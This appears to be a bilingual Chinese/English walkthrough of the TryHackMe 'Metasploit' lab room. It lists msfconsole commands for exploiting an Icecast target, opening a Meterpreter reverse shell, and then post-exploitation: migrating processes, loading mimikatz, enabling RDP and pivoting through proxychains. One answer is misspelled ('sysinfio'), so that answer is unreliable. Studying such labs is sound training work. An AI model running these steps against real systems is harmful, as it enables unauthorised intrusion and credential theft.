Tryhackme – Metasploit

項目名稱:Metasploit

Task.1 Intro

Q1.Kali and most other security distributions of Linux include Metasploit by default. If you are using a different distribution of Linux, verify that you have it installed or install it from the Rapid 7 Github repository.

安裝好Metasploit並準備好執行

Task.2 Initializing…

Q1.First things first, we need to initialize the database! Let’s do that now with the command: msfdb init

初始化數據庫 輸入下列指令

sudo msfdb init

Q2.Before starting Metasploit, we can view some of the advanced options we can trigger for starting the console. Check these out now by using the command: msfconsole -h

輸入下列指令查看可用參數

msfconsole -h

中文版本

msfconsole -h
用法：msfconsole [選項]

常用選項：
    -E, --environment ENVIRONMENT 設置 Rails 環境，默認為 RAIL_ENV 環境變量或 'production'

數據庫選項：
    -M, --migration-path DIRECTORY 指定包含額外數據庫遷移的目錄
    -n, --no-database 禁用數據庫支持
    -y, --yaml PATH 指定包含數據庫設置的 YAML 文件

框架選項：
    -c FILE 加載指定的配置文件
    -v, -V, --version 顯示版本

模塊選項：
        --defer-module-loads 除非明確要求，否則推遲模塊加載
    -m, --module-path DIRECTORY 加載額外的模塊路徑

控制台選項：
    -a, --ask 在退出 Metasploit 之前詢問或接受 'exit -y'
    -H, --history-file FILE 保存命令歷史到指定文件
    -L, --real-readline 使用系統 Readline 庫而不是 RbReadline
    -o, --output FILE 輸出到指定文件
    -p, --plugin PLUGIN 在啟動時加載插件
    -q, --quiet 不要在啟動時打印橫幅
    -r, --resource FILE 執行指定的資源文件（- for stdin）
    -x, --execute-command COMMAND 執行指定的控制台命令（使用 ; 表示多個）
    -h, --help 顯示此消息

Q3.We can start the Metasploit console on the command line without showing the banner or any startup information as well. What switch do we add to msfconsole to start it without showing this information? This will include the ‘-‘

A:-q

哪個參數可以不顯示msfcolsole的開啟訊息? 一般來說msfcolsole開啟都會有一個隨機出現的圖片跟一些資訊 要跳過的話就-q

沒有-q:

有-q:

Q4.Once the database is initialized, go ahead and start Metasploit via the command: msfconsole

輸入下面命令開啟msfcolsole

msfconsole

Q5.After Metasploit has started, let’s go ahead and check that we’ve connected to the database. Do this now with the command: db_status

輸入下面指令檢查是否正確連接資料庫

db_status

Q6.Cool! We’ve connected to the database, which type of database does Metasploit 5 use?

A:PostgreSQL

Metasploit 5 用的是哪種資料庫?

Task.3 Rock ’em to the Core [Commands]

Q1.Let’s go ahead and start exploring the help menu. On the Metasploit prompt (where we’ll be at after we start Metasploit using msfconsole), type the command: help

輸入下面指令幫助探索Metasploit

help

Q2.The help menu has a very short one-character alias, what is it?

A:?

在help裡面有一個很短的單字符 它是什麼?

Q3.Finding various modules we have at our disposal within Metasploit is one of the most common commands we will leverage in the framework. What is the base command we use for searching?

A:search

在Metasploit裡面 搜索的指令是什麼?

Q4.Once we’ve found the module we want to leverage, what command we use to select it as the active module?

A:use

怎麼選擇想要用的模組?

Q5.How about if we want to view information about either a specific module or just the active one we have selected?

A:info

要怎麼看特定模組的訊息?

Q6.Metasploit has a built-in netcat-like function where we can make a quick connection with a host simply to verify that we can ‘talk’ to it. What command is this?

A:connect

Metasploit裡面有一個很像netcat的功能 可以驗證主機是否存活 這個指令是什麼?

Q7.Entirely one of the commands purely utilized for fun, what command displays the motd/ascii art we see when we start msfconsole (without -q flag)?

A:banner

哪個指令可以顯示出msfconsole開啟時的圖案?

Q8.We’ll revisit these next two commands shortly, however, they’re two of the most used commands within Metasploit. First, what command do we use to change the value of a variable?

A:set

哪個指令可以調整參數的內容?

Q9.Metasploit supports the use of global variables, something which is incredibly useful when you’re specifically focusing on a single box. What command changes the value of a variable globally?

A:setg

哪個指令可以調整全域變數的內容?

Q10.Now that we’ve learned how to change the value of variables, how do we view them? There are technically several answers to this question, however, I’m looking for a specific three-letter command which is used to view the value of single variables.

A:get

哪個指令可以查看單個變數的值?

Q11.How about changing the value of a variable to null/no value?

A:unset

哪個指令可以把變數的值變成空值?

Q12.When performing a penetration test it’s quite common to record your screen either for further review or for providing evidence of any actions taken. This is often coupled with the collection of console output to a file as it can be incredibly useful to grep for different pieces of information output to the screen. What command can we use to set our console output to save to a file?

A:spool

哪個指令可以把輸出轉為文件?

Q13.Leaving a Metasploit console running isn’t always convenient and it can be helpful to have all of our previously set values load when starting up Metasploit. What command can we use to store the settings/active datastores from Metasploit to a settings file? This will save within your msf4 (or msf5) directory and can be undone easily by simply removing the created settings file.

A:save

哪個指令可以儲存活動數據?(可以刪掉/home/<Username>/.msf4/config來重置)

Task.4 Modules for Every Occasion!

Metasploit主要由6個模塊組成

Q1.Easily the most common module utilized, which module holds all of the exploit code we will use?

A:exploit

哪個模組包含我們所有用到的漏洞利用腳本?

Q2.Used hand in hand with exploits, which module contains the various bits of shellcode we send to have executed following exploitation?

A:payload

哪個模組和exploit一起使用?(通常在exploit後面執行

Q3.Which module is most commonly used in scanning and verification machines are exploitable? This is not the same as the actual exploitation of course.

A:Auxiliary

哪個模組是用於掃描目標是否是有可利用漏洞的?

Q4.One of the most common activities after exploitation is looting and pivoting. Which module provides these capabilities?

A:Post

哪個模組可以提供掠奪和旋轉的功能(?

Q5.Commonly utilized in payload obfuscation, which module allows us to modify the ‘appearance’ of our exploit such that we may avoid signature detection?

A:Encoder

哪個模組可以改變exploit的外觀來規避檢測?

Q6.Last but not least, which module is used with buffer overflow and ROP attacks?

A:NOP

哪個模組可以使用緩衝區溢位和ROP攻擊?

Q7.Not every module is loaded in by default, what command can we use to load different modules?

A:load

哪個參數可以加載還沒被載入的模塊?

Task.5 Move that shell!!

開始實作

Q1.Metasploit comes with a built-in way to run nmap and feed it’s results directly into our database. Let’s run that now by using the command db_nmap -sV <IP>

輸入下面的指令來使用nmap

db_nmap -sV <IP>

Q2.What service does nmap identify running on port 135?

A:msrpc

Port 135的服務名稱是什麼?

Q3.Let’s go ahead and see what information we have collected in the database. Try typing the command hosts into the msfconsole now.

輸入下列命令來查看總共收集了多少資料

hosts

Q4.How about something else from the database, try the command services now.

輸入下列命令來查看其他的內容是什麼

services

Q5.One last thing, try the command vulns now. This won’t show much at the current moment, however, it’s worth noting that Metasploit will keep track of discovered vulnerabilities. One of the many ways the database can be leveraged quickly and powerfully.

輸入下列命令來查看已經發現的漏洞

vulns

Q6.Now that we’ve scanned our victim system, let’s try connecting to it with a Metasploit payload. First, we’ll have to search for the target payload. In Metasploit 5 (the most recent version at the time of writing) you can simply type use followed by a unique string found within only the target exploit. For example, try this out now with the following command use icecast. What is the full path for our exploit that now appears on the msfconsole prompt? *This will include the exploit section at the start A:exploit/windows/http/icecast_header

使用icecast_header腳本 輸入下列命令搜尋並使用icecast_hander

use icecast

接下來文章要我們使用另一個腳本 所以我們必須先搜尋再使用

search multi/handler

接著使用第6個

use 6

Q7.What is the name of the column on the far left side of the console that shows up next to ‘Name’?

A:#

顯示在最左邊的東西是什麼?

Q8.Now type the command use NUMBER_FROM_PREVIOUS_QUESTION. This is the short way to use modules returned by search results.

輸入下列命令來使用腳本

use <Number>

Q9.Next, let’s set the payload using this command set PAYLOAD windows/meterpreter/reverse_tcp. In this way, we can modify which payloads we want to use with our exploits. Additionally, let’s run this command set LHOST YOUR_IP_ON_TRYHACKME. You might have to check your IP using the command ip addr, it will likely be your tun0 interface.

更改Payload

set payload windows/meterpreter/reverse_tcp

更改本地IP

set lhost <IP>

Q10.Let’s go ahead and return to our previous exploit, run the command use icecast to select it again.

接著再回到剛剛的icecast腳本

use icecast

Q11.One last step before we can run our exploit. Run the command set RHOSTS <IP> to tell Metasploit which target to attack.

在攻擊前 我們必須先把所有Required說yes的欄位都填滿 不然腳本不會順利運行

show options

可以看到RHOST沒有被填上

set rhosts <IP>

最後再檢查一次

show options

Q12.Once you’re set those variables correctly, run the exploit now via either the command exploit or the command run -j to run this as a job. Okay.

一切準備都完成 Let’s GO!

exploit

攻擊成功 已建立初始Reverse Shell

Q13.Once we’ve started this, we can check all of the jobs running on the system by running the command jobs

輸入jobs來檢查系統上運行的所有作業 但在那之前 必須先回到msfcolsole本體

CTRL+Z

jobs

Q14.After we’ve established our connection in the next task, we can list all of our sessions using the command sessions. Similarly, we can interact with a target session using the command sessions -i SESSION_NUMBER

可以輸入下面命令來查看所有已連接的session

sessions

接著再把上面的數字填到後面就能回去Reverse Shell了

sessions <Number>

Task.6 We’re in, now what?

Q1.First things first, our initial shell/process typically isn’t very stable. Let’s go ahead and attempt to move to a different process. First, let’s list the processes using the command ps. What’s the name of the spool service?

A:spoolsv.exe

spool的Process名稱是什麼? 因為我們的初始Reverse Shell通常不是很穩定 所以我們必須把Shell轉移到另一個Process上

ps

ps可以看到所有執行中的Process 可以看到spool的Process名稱是spoolsv.exe

Q2.Let’s go ahead and move into the spool process or at least attempt to! What command do we use to transfer ourselves into the process? This won’t work at the current time as we don’t have sufficient privileges but we can still try!

A:migrate 轉移Shell至該Process(雖然說現在權限不夠就是了

Q3.Well that migration didn’t work, let’s find out some more information about the system so we can try to elevate. What command can we run to find out more information regarding the current user running the process we are in?

A:getuid

哪個命令可以顯示出當前用戶的訊息?

Q4.How about finding more information out about the system itself?

A:sysinfio

哪個命令可以顯示出系統詳細資訊?

Q5.This might take a little bit of googling, what do we run to load mimikatz (more specifically the new version of mimikatz) so we can use it?

A:load kiwi

要怎麼加載mimikatz?

Q6.Let’s go ahead and figure out the privileges of our current user, what command do we run?

A:getprivs

哪個指令可以讓我們知道現在用戶的權限?

Q7.What command do we run to transfer files to our victim computer?

A:upload

哪個命令可以讓我們上傳檔案到目標電腦?

Q8.How about if we want to run a Metasploit module?

A:run

哪個命令可以運行Metasploit的模塊?

Q9.A simple question but still quite necessary, what command do we run to figure out the networking information and interfaces on our victim?

A:ipconfig

哪個命令可以列出目標的網路資訊?

Q10.Let’s go ahead and run a few post modules from Metasploit. First, let’s run the command run post/windows/gather/checkvm. This will determine if we’re in a VM, a very useful piece of knowledge for further pivoting.

運行checkvm模塊來確定這台目標是不是VM

run post/windows/gather/checkvm

Q11.Next, let’s try: run post/multi/recon/local_exploit_suggester. This will check for various exploits which we can run within our session to elevate our privileges. Feel free to experiment using these suggestions, however, we’ll be going through this in greater detail in the room Ice.

接著運行local_exploit_suggester來提升我們的權限

run post/multi/recon/local_exploit_suggester

Q12.Finally, let’s try forcing RDP to be available. This won’t work since we aren’t administrators, however, this is a fun command to know about: run post/windows/manage/enable_rdp

最後使用enable_rdp來強制啟用RDP

run post/windows/manage/enable_rdp

Q13.One quick extra question, what command can we run in our meterpreter session to spawn a normal system shell?

A:shell

哪個命令可以生成一個正常系統的Shell?

Task.7 Makin’ Cisco Proud

Q1.Let’s go ahead and run the command run autoroute -h, this will pull up the help menu for autoroute. What command do we run to add a route to the following subnet: 172.18.1.0/24? Use the -n flag in your answer.

A:run autoroute -s 172.18.1.0 -n 255.255.255.0

要怎樣才能將路由添加到下列子網:172.18.1.0?

Q2.Additionally, we can start a socks5 proxy server out of this session. Background our current meterpreter session and run the command search server/socks5. What is the full path to the socks5 auxiliary module?

A:auxiliary/server/socks5

我們可以從這個session啟用一個socks5 Proxy Server

CTRL+Z

search server/socks5

Q3.Once we’ve started a socks server we can modify our /etc/proxychains.conf file to include our new server. What command do we prefix our commands (outside of Metasploit) to run them through our socks5 server with proxychains?

A:proxychains

如果我們啟用了socks伺服器 那就可以在/etc/proxychains.conf文件裡新增我們的新伺服器 要在命令前加入什麼命令來通過我們帶有proxy chain的socks5伺服器來運行他們?

心得:

這篇真的是有夠長也花了我超久的時間(從3:30到6:00 這個項目我覺得對於沒碰過msfcolsole的人來說非常有用 能學到Metasploit的基本操作跟相關知識 但某些比較進階的東西好像就沒什麼提到? 可能要等到打滲透測試那些項目才會比較熟悉進階的步驟

免責聲明

未經事先雙方同意,使用工具攻擊目標是非法的.請遵守當地法律規範.開發者與本作者對此工具不承擔任何責任,也不對任何濫用或損壞負責.

This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.